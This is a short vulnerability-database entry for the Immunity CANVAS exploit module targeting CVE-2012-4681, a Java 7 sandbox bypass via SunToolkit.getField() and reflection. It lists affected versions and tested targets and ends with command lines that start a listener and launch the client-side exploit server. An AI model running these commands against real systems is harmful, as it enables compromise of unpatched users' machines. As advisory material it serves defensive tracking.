Immunity Canvas: JAVA_FORNAME_GETFIELD

2012-08-28T00:55:00
ID JAVA_FORNAME_GETFIELD
Type canvas
Reporter Immunity Canvas
Modified 2012-08-28T00:55:00

Description

Name| java_forName_getField
---|---
CVE| CVE-2012-4681
Exploit Pack| CANVAS
Description| Java forName/getField Method Invocation Sandbox Bypass
Notes| CVE Name: CVE-2012-4681
VENDOR: Sun
Notes:
There is a method invocation vulnerability using sun.awt.SunToolkit.getField()
This vulnerability can then be used together with some reflection tricks to disable the Java Security Manager to escape the sandbox.

Affected versions
JDK and JRE 7 Update 6 and earlier

Note: this does not work under JRE 6 due to the getField() function not working correctly.

Tested on:
- Windows 7 SP1 with JDK/JRE 7 and 7 update 6
- Windows XP SP3 with JDK/JRE 7 and 7 update 6

Needs more testing (likley to work on other targets)

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17
And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_forName_getField -O allowed_recon_modules:js_recon -O auto_detect_exploits:0

Repeatability: Infinite (client side - no crash)
References: http://pastie.org/4594319
Date public: 07/26/2012